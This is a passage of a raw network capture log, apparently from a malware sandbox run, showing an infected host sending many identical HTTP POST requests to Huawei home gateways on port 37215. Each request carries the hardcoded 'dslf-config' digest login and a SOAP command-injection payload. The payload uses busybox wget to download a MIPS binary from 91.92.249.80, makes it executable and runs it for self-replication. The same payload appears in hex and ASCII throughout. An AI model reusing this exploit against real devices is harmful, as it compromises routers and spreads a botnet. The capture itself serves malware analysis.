                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2316192.168.2.2341070197.10.167.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668258905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2317192.168.2.234700441.79.142.2137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668745041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2318192.168.2.2360796197.237.154.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668859959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2319192.168.2.2339984163.180.240.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668862104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2320192.168.2.2342160175.22.115.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668889046 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2321192.168.2.2346432157.19.124.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668978930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2322192.168.2.2336170197.231.27.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668997049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2323192.168.2.233536841.216.102.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669121027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2324192.168.2.236047461.20.41.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669153929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2325192.168.2.2338858157.92.124.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669255018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
